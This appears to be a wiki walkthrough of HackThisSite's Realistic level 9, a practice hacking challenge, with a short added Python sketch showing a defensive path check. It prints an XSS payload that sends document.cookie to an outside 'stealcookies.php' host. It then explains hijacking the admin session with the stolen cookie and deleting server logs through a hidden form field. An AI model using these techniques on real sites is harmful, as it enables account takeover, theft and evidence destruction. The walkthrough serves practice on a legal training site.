Hackthissite/Realistic/Level9

From aldeid

The boss over at CrappySoft has stopped paying his employees, and your friend is in need of money, fast. Help them get their salary paid.

Message: Hey man, I've heard you're good at hacking, and on the right side of things. So I came looking for you. I really need help, you see, my boss has stopped paying our salaries and I'm going to miss my rent! Please help me get my money, you can reach the site at Crappy Soft. They have an online payment system, but only he can use it. Maybe you can get into his account somehow, but for now you can use mine:

Thanks man, good luck.

  • Solution:

Connect as administrator

Click on "Private Message" in the menu and fill in the form as follows, using the following XSS payload:

javascript:void(window.location='http://domain.tld/stealcookies.php?'+document.cookie);

Hackthissite-realistic-9-10.png

To simplify the attack, the site directly provides us with the stolen information:

Use Firecookie in Firefox to change the values as follows:

Hackthissite-realistic-9-20.png

When you paste the username value, take care to replace "%40" with "@" ("%40" is the URL-encoded form of that character).

Click on Pay salaries and then on the Pay button. You're done with this stage.

Cover your tracks

Click on the "Mailing list" link and edit the source code. Notice that there is a hidden field named strFilename with the value ./files/mailinglist/addresses.txt. If you look at this file, you will get the list of email addresses:

Hackthissite-realistic-9-30.png

Hackthissite-realistic-9-40.png

In addition, the mailing list form says that it deletes all references that do not contain "@", which is perfect for clearing the log file. Also notice that directory listing is enabled on the files/ directory. We can find our log file there:

Hackthissite-realistic-9-50.png

Just replace the value in the hidden field with this:

./files/logs/logs.txt

Submit the form and you're done!
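
Seen from the defender's side, this step works because the server acts on whatever path arrives in strFilename. The following is an added example, not part of the original page or of the challenge's code: a Python sketch contrasting that trusting pattern with a check that confines the field to the mailing-list directory. WEB_ROOT and the function names are assumptions; the relative paths are the ones quoted above.

```python
import os

# Assumptions for this sketch: WEB_ROOT is a hypothetical document root; the
# relative paths are the ones quoted on the page.
WEB_ROOT = "/var/www/crappysoft"
ALLOWED_DIR = os.path.join(WEB_ROOT, "files", "mailinglist")


def resolve_trusting(str_filename):
    """Pattern the level relies on: the hidden field's value is used as-is."""
    return os.path.normpath(os.path.join(WEB_ROOT, str_filename))


def resolve_checked(str_filename):
    """Canonicalise first, then require the result to stay inside the single
    directory the mailing-list form is meant to touch."""
    if "\x00" in str_filename:
        raise ValueError("NUL byte in file name")
    base = os.path.realpath(ALLOWED_DIR)
    candidate = os.path.realpath(os.path.join(WEB_ROOT, str_filename))
    # commonpath compares whole path components, so a sibling directory such
    # as files/mailinglist_old does not pass the way a prefix match would.
    if os.path.commonpath([base, candidate]) != base or candidate == base:
        raise PermissionError("path outside mailing-list directory")
    return candidate


def is_allowed(str_filename):
    """True when resolve_checked() accepts the submitted value."""
    try:
        resolve_checked(str_filename)
        return True
    except (ValueError, PermissionError):
        return False


if __name__ == "__main__":
    # Constructed sample values for the strFilename field.
    for value in ("./files/mailinglist/addresses.txt",
                  "./files/logs/logs.txt",
                  "./files/mailinglist/../logs/logs.txt",
                  "/tmp/other.txt"):
        print(f"{value!r:45} allowed={is_allowed(value)}")
```

A stricter design drops the hidden field entirely and has the server choose the file itself, so nothing the client sends can name a path.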
